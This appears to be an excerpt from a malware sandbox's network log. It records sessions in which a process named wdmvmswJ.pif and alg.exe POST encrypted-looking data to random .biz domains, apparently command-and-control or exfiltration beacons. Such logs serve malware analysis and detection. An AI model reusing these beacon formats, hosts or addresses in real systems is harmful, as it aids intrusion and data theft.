                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        98192.168.2.84982518.208.156.248804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.621440887 CET356OUTPOST /udqtfnpdyqh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:32.621464014 CET802OUTData Raw: 9c c3 db 99 3c ed 80 80 16 03 00 00 b8 f4 63 f7 23 d8 b4 cb 35 06 26 9b 99 02 54 8a 49 3d 71 d1 9b e3 dc 47 a9 b4 f8 37 c3 a8 21 2a bd 2f e0 13 e8 9f b3 ac 6f e2 70 eb db 27 30 a0 f7 e5 d0 d2 37 fe 4c be 2f 7d 6f 5d e4 e0 a8 25 d8 66 7a 51 a8 2e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <c#5&TI=qG7!*/op'07L/}o]%fzQ.B42Mb ]zxN_|PU68*tlVK2OMR8> EcwF=^kv8Kv|x|`(a#D>}up%t}BW
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.283320904 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=427700877420d0be4aa2e428a282ac89|173.254.250.82|1730445873|1730445873|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        99192.168.2.84982634.211.97.45804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.134449959 CET350OUTPOST /kacads HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.134476900 CET778OUTData Raw: 50 b8 e7 50 a6 a5 93 3f fe 02 00 00 26 71 48 b2 17 3f 0a 74 db b1 89 0f 30 cc d8 5e 35 3b 1a de 30 59 b8 bd 46 11 c7 68 75 4d ed 0d 27 85 14 22 14 a9 39 66 cf 43 9f 43 de 99 4c 2f 44 7e 58 44 21 84 13 e5 10 a7 95 bc f9 9f 3c e9 d6 23 c4 a0 ad 13
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PP?&qH?t0^5;0YFhuM'"9fCCL/D~XD!<#zIC[/A|@F/2Q VSPB)5T}Bm)4H9eTV[r@l;ObG5pJ"\#DWTAW"()($+*PN?A.g'
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.968082905 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8e8931a29cd59927cc5d604c2e58c413|173.254.250.82|1730445873|1730445873|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        100192.168.2.84982713.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.357310057 CET348OUTPOST /nuyubw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:33.357337952 CET802OUTData Raw: 62 45 2d 2f a7 b6 5a 65 16 03 00 00 03 14 0c 86 6a 1a 5f 60 86 21 e6 93 de d7 8a 9b 65 68 5d b7 18 17 71 63 90 d9 af 78 bf ce e8 d5 5c f0 bf 3b 04 55 e5 3e ab b9 59 e4 77 55 6b 54 3f a5 ea e9 f2 ba df 8d 65 76 02 5f b5 d3 ba f6 3c 16 d6 59 4f 0e
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bE-/Zej_`!eh]qcx\;U>YwUkT?ev_<YO1z)x_+Cqw6,^fd !GL{7@zn.Vjva|j%C[#{ygYQyUB~@ytv?X.":t};]rA9L=&"#
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.800206900 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=29d8ead88d9578ef89faf29a4135fea4|173.254.250.82|1730445874|1730445874|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        101192.168.2.84983847.129.31.212804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595730066 CET344OUTPOST /rn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.595746994 CET778OUTData Raw: be 5e 66 ca 97 f0 96 be fe 02 00 00 f8 39 a1 07 6f 90 c5 c3 9d d7 7d 3c ed a5 d6 cc b3 f3 ce 24 67 d9 04 60 fd 9f 09 1a b0 9b 28 2f 3c 63 17 e2 df 30 21 a2 d7 19 90 d8 a3 7a ff c3 f9 43 31 a6 3b d6 81 59 90 e1 8a 50 ce ce 00 43 a1 05 ac f5 9b f7
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ^f9o}<$g`(/<c0!zC1;YPC'M:fZj\t'vOtmH"JCtD[O.Oz%.~7D#EX]wy1Kish)[y>q)a~a3U?Cq{D
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.279721975 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b5d4539072af6c9db9c9e434a73b489f|173.254.250.82|1730445875|1730445875|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.281236887 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b5d4539072af6c9db9c9e434a73b489f|173.254.250.82|1730445875|1730445875|0|1|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        102192.168.2.84983934.246.200.160804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849875927 CET357OUTPOST /enxhgeexxmda HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:34.849893093 CET802OUTData Raw: 0e be a1 0e b4 6b fe 13 16 03 00 00 58 09 d5 08 04 34 eb 10 5b 3b 9e b1 76 c8 6f 3d d8 c0 57 39 26 c9 cb d5 72 ba b5 20 81 93 24 35 7d 7e 9d 09 25 1e 01 d8 1b 12 14 2f 90 f6 51 ea 0c 9d c4 08 81 cc 7f 43 40 80 33 d6 91 86 a8 b5 e3 df 47 97 85 d8
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: kX4[;vo=W9&r $5}~%/QC@3Gt"1#Jz\f5v*.[B\#_/`X0cMh+s3TS+u|n~@JkH2|RQ%u`^;`
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.818784952 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2ea3fd1d48cc5153141794d950f14d4f|173.254.250.82|1730445875|1730445875|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        103192.168.2.84984518.141.10.107804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.866821051 CET346OUTPOST /pry HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:35.866883039 CET802OUTData Raw: 6f 9a 32 8f b9 65 13 63 16 03 00 00 fa e3 b9 01 56 b4 75 99 ea 0c ce 41 8b 96 24 20 0a e1 40 f9 b8 61 6b 8d 1a da 83 6d 50 d1 2e 50 6e d2 9e ff 04 33 89 75 7c c9 ff 41 08 08 6f 41 f9 9a be ba 4e 4e fa 69 51 3d 47 7d 6c 7f 59 27 71 73 e7 dd c9 7d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: o2ecVuA$ @akmP.Pn3u|AoANNiQ=G}lY'qs}Aw$9Uv4"oJ>P}/AEsN|[K<v{mO7j\(c/Cr4b%~'="yIEO*@jap&:2TBJ
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.935671091 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=143826c929e75164296f22a14a6f45c6|173.254.250.82|1730445877|1730445877|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.937845945 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=143826c929e75164296f22a14a6f45c6|173.254.250.82|1730445877|1730445877|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        104192.168.2.84985113.251.16.150804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.442747116 CET347OUTPOST /xrcr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:36.443625927 CET778OUTData Raw: 26 09 5a 2c 55 2b 2a 55 fe 02 00 00 8a e2 20 cd 63 f1 90 aa 6d fb 02 99 79 22 3c f3 44 4b f5 f3 75 7f 8c 8f 4a 7a 96 ba 49 d6 00 a9 af a4 eb 3a 55 02 41 a0 4d c6 5c 39 08 fa 05 4a c0 22 83 be ff 64 05 fa 60 24 19 a6 64 b2 80 d7 ab 64 5f 0c 30 f3
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &Z,U+*U cmy"<DKuJzI:UAM\9J"d`$dd_0;GflpK?G;3R7NqX<)n>ALs<D_1q{;GA{Np}dYL~Iky_1WzI>!,BGb?t>]H+"J^Y4n/g
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.935823917 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=919dd2f3e3f826545690cc0a8d7cf35f|173.254.250.82|1730445877|1730445877|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        105192.168.2.84985713.251.16.150804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993966103 CET343OUTPOST /nr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:37.993978024 CET802OUTData Raw: 5b cf ca c6 38 1f 5f b1 16 03 00 00 88 f0 26 2e 63 71 35 57 9f 1b af 49 e4 2d 8a 6d 29 18 b1 0e 7b 3a 03 01 3a 42 a5 5d dc b1 84 cc 1a 85 05 f4 70 91 b1 98 c8 31 f7 77 c4 a8 ae 6f 6f 4b 6d 5c 15 60 11 59 97 f5 fe 4c 87 20 2f 47 03 3b ff cc 2f ec
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [8_&.cq5WI-m){::B]p1wooKm\`YL /G;/";rHb;bK=qlT3)]v7e;w6:`6iB^rVEx=e:[`'_5Y4k\jf-R7D-d>a'3!?8o8*9iS
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:39.435184002 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d358cd36378377b6335a2ffc34b0189e|173.254.250.82|1730445879|1730445879|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        106192.168.2.84986034.211.97.45804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.137952089 CET344OUTPOST /uku HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.137967110 CET778OUTData Raw: 2b 88 53 7b dd db 63 72 fe 02 00 00 88 dd 5b e7 ed 6b d0 5e fe 21 c4 c1 ff 03 99 4e 41 bc d9 fc a5 a6 41 4b 0b ac e4 1d 2c cd ce 3d 5e db 12 ed 45 72 55 b8 e7 79 1b 4b 97 8b ee e3 7b 3e 0a 3f 2a 0a a6 9a 21 ee 43 e2 55 f4 00 9e 9f d4 ed 65 07 90
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +S{cr[k^!NAAK,=^ErUyK{>?*!CUeFsr&V690EfwE*`%PTq`_Av5Z3o\[{"AR$Fnpqc:<K2eB[E6c|%-u5cF^wfb
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:38.979274988 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=31ac332b4f32e9b7921263e30e9871e7|173.254.250.82|1730445878|1730445878|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        107192.168.2.8498683.94.10.34804916C:\Windows\System32\alg.exe
